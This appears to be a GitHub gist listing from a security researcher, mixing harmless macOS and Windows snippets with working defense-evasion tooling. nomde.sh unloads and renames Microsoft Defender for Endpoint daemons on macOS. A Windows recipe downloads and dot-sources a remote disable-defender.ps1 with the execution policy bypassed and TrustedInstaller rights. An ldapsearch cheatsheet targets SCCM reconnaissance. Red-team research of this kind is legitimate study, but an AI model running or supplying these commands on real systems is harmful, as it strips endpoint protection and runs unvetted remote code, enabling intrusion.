
@p4yl0ad
p4yl0ad / blah.c
Last active January 20, 2024 17:24
XPC Errors
// security error -9999
// -67030 = Error: 0xFFFEFA2A -67030 invalid Info.plist (plist or signature have been modified)
// -67050 = Error: 0xFFFEFA16 -67050 code failed to satisfy specified code requirement(s)
// -67062 = Error: 0xFFFEFA0A -67062 code object is not signed at all
// -67065 = Error: 0xFFFEFA07 -67065 host has no guest with the requested attributes
@p4yl0ad
p4yl0ad / hardlinktest.m
Last active December 28, 2023 20:34
poc to test symbolic link for specific target
/* gcc -framework Foundation hardlinktest.m -o hardlinktest */
#import <Foundation/Foundation.h>
int main(int argc, const char * argv[]) {
@autoreleasepool {
if (argc < 2) {
NSLog(@"Usage: hardlinktest <path>");
return 1; // Indicate error
}
@p4yl0ad
p4yl0ad / nomde.sh
Last active December 8, 2023 19:45
nomde.sh
sudo mv /Library/LaunchDaemons/com.microsoft.autoupdate.helper.plist /Library/LaunchDaemons/old.com.microsoft.autoupdate.helper.plist
sudo mv /Library/LaunchDaemons/com.microsoft.dlp.install_monitor.plist /Library/LaunchDaemons/old.com.microsoft.dlp.install_monitor.plist
sudo mv /Library/LaunchDaemons/com.microsoft.fresno.plist /Library/LaunchDaemons/old.com.microsoft.fresno.plist
sudo mv /Library/LaunchDaemons/com.microsoft.fresno.uninstall.plist /Library/LaunchDaemons/old.com.microsoft.fresno.uninstall.plist
sudo launchctl bootout system/com.microsoft.fresno.uninstall
sudo launchctl bootout system/com.microsoft.dlp.install_monitor
sudo launchctl bootout system/com.microsoft.fresno
sudo launchctl bootout system/com.microsoft.fresno.uninstall
sudo launchctl bootout system/com.microsoft.autoupdate.helper
@p4yl0ad
p4yl0ad / newproc.d
Created December 3, 2023 19:17
newproc.d dtrace script from macOS
#!/usr/sbin/dtrace -s
/*
* newproc.d - snoop new processes as they are executed. DTrace OneLiner.
*
* This is a DTrace OneLiner from the DTraceToolkit.
*
* 15-May-2005 Brendan Gregg Created this.
*/
/*
@p4yl0ad
p4yl0ad / .bashrc
Last active November 10, 2023 23:20
macOS bashrc
# chsh -s /bin/bash
# Settings -> Users & Groups -> Right Click User ->
# MISC ALIAS COMMANDS
alias dir='ls -lah'
alias ls='ls -lah'
alias ipconfig='ifconfig'
alias cls='clear'
# MISC USEFUL SHORTCUTS
$searchterm = "IID_IWSCProductList"
$dumpbinpath = "C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\bin\Hostx64\x64\dumpbin.exe"
$x64_pathtosearch = "C:\Windows\System32\"
$x86_pathtosearch = "C:\Windows\SysWOW64\"
$stamp = (Get-Date).ToString("yyyy-MM-dd_HH-mm-ss")  # MM = month; lowercase mm is minutes
$logpath = "C:\Users\user\Desktop\Initialize_hunt-$stamp.log"
@p4yl0ad
p4yl0ad / rpc-hunt.ps1
Created October 30, 2023 21:06
rpc-hunt.ps1
# https://csandker.io/2021/02/21/Offensive-Windows-IPC-2-RPC.html#rpc-servers
Get-ChildItem -Path "C:\Windows\System32\" -Filter "*.exe" -Recurse -ErrorAction SilentlyContinue | % { $out=$(C:\"Program Files (x86)"\"Microsoft Visual Studio 14.0"\VC\bin\dumpbin.exe /IMPORTS:rpcrt4.dll $_.VersionInfo.FileName); If($out -like "*RpcServerListen*"){ Write-Host "[+] Exe starting RPC Server: $($_.VersionInfo.FileName)"; Write-Output "[+] $($_.VersionInfo.FileName)`n`n $($out|%{"$_`n"})" | Out-File -FilePath EXEs_RpcServerListen.txt -Append } }

Download "AdvancedRun" from NirSoft. Spawn a PowerShell process with TrustedInstaller permissions and run the following with the -delete flag: https[:]//raw.githubusercontent.com/jeremybeaume/tools/master/disable-defender.ps1

irm https://raw.githubusercontent.com/jeremybeaume/tools/master/disable-defender.ps1 -Outfile disable-defender.ps1
Set-ExecutionPolicy Bypass -Scope LocalMachine
. .\disable-defender.ps1
@p4yl0ad
p4yl0ad / ldap-cheatsheet.md
Last active March 19, 2024 01:53
ldap cheatsheet

ldapsearch cheatsheet

SCCM

ldapsearch (objectClass=mSSMSManagementPoint) cn,name,dNSHostName,mSSMSSiteCode,mSSMSMPName 0 ""

Maybe these too, need to experiment

mSSMSSite
mSSMSServerLocatorPoint
@p4yl0ad
p4yl0ad / AlertEntryx86.dll
Created October 12, 2023 11:32
base64 AlertEntryx86.dll